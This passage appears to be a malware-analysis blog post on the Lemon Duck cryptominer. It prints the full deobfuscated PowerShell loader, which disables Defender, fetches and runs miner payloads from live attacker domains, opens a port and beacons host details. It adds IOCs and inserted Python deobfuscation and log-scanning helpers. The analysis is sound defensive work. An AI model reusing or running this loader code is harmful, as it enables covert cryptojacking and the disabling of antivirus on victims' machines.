F2ErsaParams.Modulus = 0xda,0x65,0xa8,0xd'+'7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,'+'0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0x'+'d1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x'+'34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6'+',0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0x'+'ea,0x38,0xb7,0x47,0x6b,0x5d
F2Er'+'saParams.Expon'+'ent = 0x01,0x00,0x01
F2Ers'+'a = New-Object -Ty'+'peName System.Security.Cryptography.RSACryptoServiceProvider;
F2Ersa.ImportP'+'arameters(F2ErsaParams)
F'+'2Ebas'+'e64 = -join([char[]]F2E'+'sign_bytes)
F2EbyteArray = [convert]::FromBase64String(F2Ebase64)
F2Esha1 = New-Object Syst'+'em.Secu'+'rity.Cryptography.SHA1CryptoServiceProvider
if(F2Ersa.verifyData(F2Eraw_bytes,F2Esha1,F2EbyteArray)) {
I'+'EX (-join[char[]]F2Eraw_bytes)
}
}
} catch{}
}
Start'+'-Sleep -Seconds 3
SIEX JGAF2Ecore_url/report.jspJGA
')-rEplAcE ([cHaR]87+[cHaR]100+[cHaR]110),[cHaR]124 -rEplAcE'E2D',[cHaR]39 -rEplAcE ([cHaR]70+[cHaR]50+[cHaR]69),[cHaR]36-crEPLAcE([cHaR]100+[cHaR]48+[cHaR]120),[cHaR]96-crEPLAcE'JGA',[cHaR]34 -rEplAcE ([cHaR]113+[cHaR]53+[cHaR]69),[cHaR]92) )
There is another layer of obfuscation here; malware developers add several layers of obfuscation in order to evade antivirus products. Let's deobfuscate this layer.
Stage 4
This layer looks like PowerShell code; I formatted it and added a few comments as well.
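As an added example (my own code, not from the article or the malware), here is a small Python deobfuscator that replays the wrapper's own -replace/-creplace chain from the last line above: it joins the '+' split fragments, substitutes the six tokens in the order the wrapper applies them, and drops the backticks that the d0x token turns into. The SAMPLE input is constructed in the wrapper's style; a saved wrapper can be passed as the first argument instead.

```python
import re

# Substitution table recovered from the -replace/-creplace chain at the end of
# the stage-3 wrapper: (obfuscated token, real character, case-sensitive).
# PowerShell's -replace is case-insensitive, -creplace is case-sensitive, and
# the wrapper applies them in exactly this order, so the table is ordered too.
TOKEN_MAP = [
    ("Wdn", "|", False),
    ("E2D", "'", False),
    ("F2E", "$", False),
    ("d0x", "`", True),
    ("JGA", '"', True),
    ("q5E", "\\", False),
]


def join_fragments(wrapper: str) -> str:
    """Undo the string splitting. The wrapper is one big single-quoted string
    assembled as 'abc'+'def'+..., so every '+' between two quotes is glue that
    PowerShell evaluates away before the replace chain runs."""
    return wrapper.replace("'+'", "")


def apply_token_map(text: str) -> str:
    """Replay the six substitutions in wrapper order. A lambda replacement is
    used so that '$' and '\\' are inserted literally, never as regex backrefs."""
    for token, real, case_sensitive in TOKEN_MAP:
        flags = 0 if case_sensitive else re.IGNORECASE
        text = re.sub(re.escape(token), lambda _m, r=real: r, text, flags=flags)
    return text


def strip_backticks(script: str) -> str:
    """The d0x token becomes a backtick, which PowerShell ignores in front of an
    ordinary letter, so Ne`w-Obj`ect is just New-Object. Assumption: this layer
    uses backticks only to split command names (as in the listing above), never
    as `n/`t escapes inside strings, so removing all of them is safe here."""
    return script.replace("`", "")


def restore(wrapper: str) -> str:
    """Full stage-3 -> stage-4 recovery for one chunk of the wrapper."""
    return strip_backticks(apply_token_map(join_fragments(wrapper)))


# Constructed sample in the same style as the wrapper (not a line from the
# real script): a split command name, a pipe, an empty string and a path.
SAMPLE = ("F2Ewc = Ned0xw-Objd'+'0xect Net.WebCd0xlient Wdn whe'+'re "
          "{F2E_ -ne E2DE2D}; F2Ep = JGAc:q5Etmpq5Ex.binJGA")

if __name__ == "__main__":
    import sys
    # Deobfuscate a saved wrapper given as argv[1], otherwise show the sample.
    src = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    print(restore(src))
```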
# Check whether the host is 64-bit or not
$is64=[int]([IntPtr]::Size -eq 8)
# Define the expected MD5 hashes of the if.bin and kr.bin payloads
#-------------------------------------block1--------------------
$ifbin="if.bin"
$ifmd5="04f9fdd312702343f074e5dd9a1ffe6f"
$krbin="kr.bin"
$krmd5="b7a1cfd74661361f71856388dac5aaa6"
#-------------------------------------block1--------------------
# If the victim host is 64-bit, define two more payloads and their MD5 hashes
if($is64){
$mbin="m6.bin"
$mmd5="32390a001e1207eafdd66e35c55aa9d3"
$mgbin="m6g.bin"
$mgmd5="26c0d79a29223e96ae52cb2775c96813"
}
# This function simply returns the MD5 sum of its input as a hex string
function gmd5($d){
[Security.Cryptography.MD5]::Create().ComputeHash($d)| foreach{ $l+=$_.ToString('x2')}
return $l
}
# This function looks for an existing copy of powershell.exe under another name; if there is none, it generates a random name and copies powershell.exe to it
function getrname(){
$rpath="C:\Windows\System32\Windowspowershell\V1.0"
$enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}
$tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))
foreach($ename in $enames){
$md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
if($tmd5 -eq $md5_){
return $ename
}
}
$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"
copy-item "$rpath\powershell.exe" "$rpath\$ename"|out-null
if(!(test-path "$rpath\$ename")){
$ename="powershell.exe"
}
return $ename
}
# The random name under which powershell.exe was copied
$rename=getrname
# Initialize the local hash values
$lifmd5,$lmmd5,$lkrmd5="","",""
# This block checks whether the payloads if.bin, m6.bin and kr.bin already exist in %tmp% and, if they do, calculates their MD5 sums
#---------------------------block2----------------------
try{
$lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))
}
catch{}
try{
$lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))
}
catch{}
try{
$lkrmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$krbin"))
}
catch{}
#---------------------------block2----------------------
# This block defines the URL variables.
#-------------------URLs--------------------
$down_url = "http://d.u78wjdu.com"
if(!$url){
$url="http://t.bb3u9.com"
}
$core_url = $url.split("/")[0..2]-join"/"
#-------------------URLs--------------------
# Checks whether the user has admin privileges
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
# This block collects information about the host machine: name, MAC address, OS version, username, domain, graphics card, RAM, etc.
#---------------------------------------block 3----------------------------------------
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$cpuname = (get-wmiobject win32_processor).name
$card = (Get-WmiObject Win32_VideoController).name
$cpu_per = "$((Get-WmiObject -Class Win32_Processor).LoadPercentage)"
gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb
try{
$drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"
}
catch{}
#---------------------------------------block 3----------------------------------------
# Tries to download JSON from localhost port 43669 and, if it succeeds, records the version, connection IP and hashrate fields (the status endpoint of a locally running miner)
try{
[Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
$obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))
$mv=$obj.version
$mip=$obj.connection.ip
$mhr=$obj.hashrate.total-join(',')
}
catch{}
# Then it tries to disable Defender's real-time monitoring, excludes the whole C: drive from scanning, and also excludes the powershell.exe process and its renamed copy from scanning (this only works when run as admin, hence the try block)
try{
Set-MpPreference -DisableRealtimeMonitoring 1
Add-MpPreference -ExclusionPath c:\
Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\$rename
}
catch{}
# Identifies the graphics card vendor
if(($card -match "GTX|NVIDIA|GEFORCE")){
$isn=1
}
if(($card -match "Radeon|AMD")){
$isa=1
}
# Builds the URL parameter string by joining the URL's query part, computer name, GUID and MAC
$v=$url.split("?")[1]
$params=@($v,$comp_name,$guid,$mac)-join"&"
# Changes to the temp directory
set-location $env:tmp
# A function to start a process through cmd.exe
function stp($gra){
write-host $gra
Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}
function gcf($code,$md,$fn){
('echo '+$code+';
$ifmd5='''+$md+''';
$ifp=$env:tmp+''\'+$fn+''';
$down_url='''+$down_url+''';
function gmd5($con){
[System.Security.Cryptography.MD5]::Create().ComputeHash($con) | foreach{$s+=$_.ToString(''x2'')};
return $s
}
if(test-path $ifp){
$con_=[System.IO.File]::ReadAllBytes($ifp);
$md5_=gmd5 $con_;
if($md5_-eq$ifmd5){
$noup=1
}
}
if(!$noup){
$con=(New-Object Net.WebClient).downloaddata($down_url+''/'+$fn+'?'+$params+''');
$t=gmd5 $con;
if($t-eq$ifmd5){
[System.IO.File]::WriteAllBytes($ifp,$con)
}
else{
$noup=1
}
}
if($noup){
$con=$con_;
$ifmd5=$md5_
}').replace('|','^^^|').replace('&','^^^&')
}
function gpa($fnam,$name){
('for($i=0;$i -lt $con.count-1;$i+=1){
if($con[$i] -eq 0x0a){
break
}
};
iex(-join[char[]]$con[0..$i]);
$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
$bin_=$bin.Clone();
$mep=$env:tmp+'''+"\$fnam.ori"+''';
[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
test1 -PEBytes $bin'
).replace('|','^^^|').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
}
function gpb($name){
'IEX(-join[char[]]$con)|'+$name+' -'
}
function gcode($fl) {
'try{
$local'+$fl+'=$flase;
New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')
}
catch{}'
}
$code1=gcode "If"
IEx $code1
if($localIf){
stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
}
if($is64){
$code2=gcode "TMn"
IEx $code2
if($localTMn){
stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
}
}
if(($isn -or $isa) -and $is64){
$code3=gcode "TMng"
IEx $code3
if($localTMng){
stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
}
}
$code4=gcode "Kr"
IEx $code4
if($localKr){
stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
}
stp ('echo try{
$s=[System.Net.Sockets.TcpListener]65529;
$s.start();
while(1){}
}
catch{}|'+$rename+' -')
$conf_f=test-path c:\windows\system32\WindowsPowerShell\v1.0\configXXX1.json
$lmip=[System.Net.Dns]::GetHostAddresses("p.b69kq.com") | foreach {echo $_.IPAddressToString }
$tpid,$tpname=(get-process|sort cpu -Descending|select-object -first 1|foreach{$_.id,$_.processname})
$tcpconn = NetStat -anop TCP
$ipport=""
foreach($t in $tcpconn){
$line = $t.split(' ')| ? {$_}
if ($line -eq $null) {
continue
}
if($t.contains("ESTABLISHED") -and ($line[-1] -eq $tpid)){
$ipport = $line[2]
break
}
}
try{
(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))
}
catch{}
$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$cpuname,$card,$mem,$cpu_per,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),($lkrmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,[Int]$conf_f,$lmip,$tpname,$ipport,"0.9")-join"&")
function SIEX {
Param([string]$url)
try{
$webclient = New-Object Net.WebClient
$finalurl = "$url"+"?"+"$params"
try{
$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
}
catch{}
$res_bytes = $webclient.DownloadData($finalurl)
if($res_bytes.count -gt 173){
$sign_bytes = $res_bytes[0..171];
$raw_bytes = $res_bytes[173..$res_bytes.count];
$rsaParams = New-Object System.Security.Cryptography.RSAParameters
$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
$rsaParams.Exponent = 0x01,0x00,0x01
$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
$rsa.ImportParameters($rsaParams)
$base64 = -join([char[]]$sign_bytes)
$byteArray = [convert]::FromBase64String($base64)
$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
IEX (-join[char[]]$raw_bytes)
}
}
}
catch{}
}
Start-Sleep -Seconds 3
SIEX "$core_url/report.jsp"
IOC
IOCs (Indicators of Compromise) are pieces of data, such as entries found in logs or files, that identify potentially malicious activity on a system or network. They help in identifying the systems that might be affected by the malware: for example, if the malware communicates with an external IP address, then any system that contacted that particular IP address is considered infected.
So in this malware the potential IOCs are:
- Any HTTP requests made to “hxxps[://]t[.]zz3ro[.]com”, “hxxps[://]t[.]zker9[.]com” or “hxxps[://]t[.]bb3u9[.]com” (URLs are defanged to prevent accidental clicks)
- Presence of a scheduled task named blackball, or one with a similar random name.
- Presence of open ports such as port no. 65529
- Presence of an event with the name blackball
- Some antivirus products being uninstalled automatically
You can get the scripts that I extracted and the IOCs we determined from this github repository
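As an added example for defenders (my own code, not part of the article), this Python snippet checks proxy-style records for the network indicators above plus two traits visible in the stage-4 script: the "Lemon-Duck-" User-Agent prefix set in SIEX and the keyless "&"-joined query that report.jsp receives. The tab-separated log format and its lines are constructed, and the keyless-query rule is a heuristic of mine.

```python
from urllib.parse import urlsplit

def refang(text: str) -> str:
    """Turn the defanged form used in the article (hxxp, [.]) back into a real
    URL or hostname so it can be compared with what a proxy log records."""
    return text.replace("hxxp", "http").replace("[.]", ".")

# Hosts and payload names taken from the script and the IOC list above
# (kept defanged in source; refang() normalises them at import time).
IOC_HOSTS = {refang(h) for h in (
    "t[.]zz3ro[.]com", "t[.]zker9[.]com", "t[.]bb3u9[.]com",  # C2 / report.jsp
    "d[.]u78wjdu[.]com",                                       # $down_url
    "p[.]b69kq[.]com",                                         # resolved into $lmip
)}
PAYLOAD_NAMES = {"if.bin", "kr.bin", "m6.bin", "m6g.bin"}  # fetched by gcf
UA_PREFIX = "Lemon-Duck-"                                  # set in SIEX

def beacon_like(path: str, query: str) -> bool:
    """The report.jsp beacon sends $params, a bare '&'-joined value list, so
    its query string has no key=value pair at all. Heuristic (assumption):
    any report.jsp request with a non-empty, '='-free query counts as a beacon."""
    return path.endswith("/report.jsp") and query != "" and "=" not in query

def check_line(line: str):
    """Check one tab-separated record: ts, client, method, url, user-agent.
    Returns (client_ip, [reasons]); an empty list means nothing matched."""
    _ts, client, _method, url, ua = line.rstrip("\n").split("\t")
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    name = parts.path.rsplit("/", 1)[-1]
    reasons = []
    if host in IOC_HOSTS:
        reasons.append("ioc-host:" + host)
    if name in PAYLOAD_NAMES:
        reasons.append("payload-name:" + name)
    if ua.startswith(UA_PREFIX):
        reasons.append("lemonduck-user-agent")
    if beacon_like(parts.path, parts.query):
        reasons.append("keyless-report.jsp-beacon")
    return client, reasons

def scan(lines):
    """Return [(client_ip, reasons)] for every record that hit at least one rule."""
    hits = []
    for line in lines:
        client, reasons = check_line(line)
        if reasons:
            hits.append((client, reasons))
    return hits

# Constructed sample records (not real traffic); the malicious URLs are written
# defanged, like the article's IOC list, and refang() normalises them.
LOG_LINES = [
    "2021-06-01T10:00:00Z\t10.0.0.5\tGET\thttp://www.example.com/index.html\tMozilla/5.0",
    "2021-06-01T10:00:03Z\t10.0.0.7\tGET\thxxp://t[.]bb3u9[.]com/report.jsp?abc&WS01&uuid&00-11-22-33-44-55\tLemon-Duck-x-y",
    "2021-06-01T10:00:05Z\t10.0.0.9\tGET\thxxp://d[.]u78wjdu[.]com/m6.bin?abc&WS02\tMozilla/5.0",
    "2021-06-01T10:00:09Z\t10.0.0.5\tGET\thttp://www.example.com/report.jsp?id=5\tMozilla/5.0",
]

if __name__ == "__main__":
    for client, reasons in scan(LOG_LINES):
        print(client, ", ".join(reasons))
```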
Thanks for Reading, Stay tuned for more ❤︎
If you enjoyed reading the article do follow me on: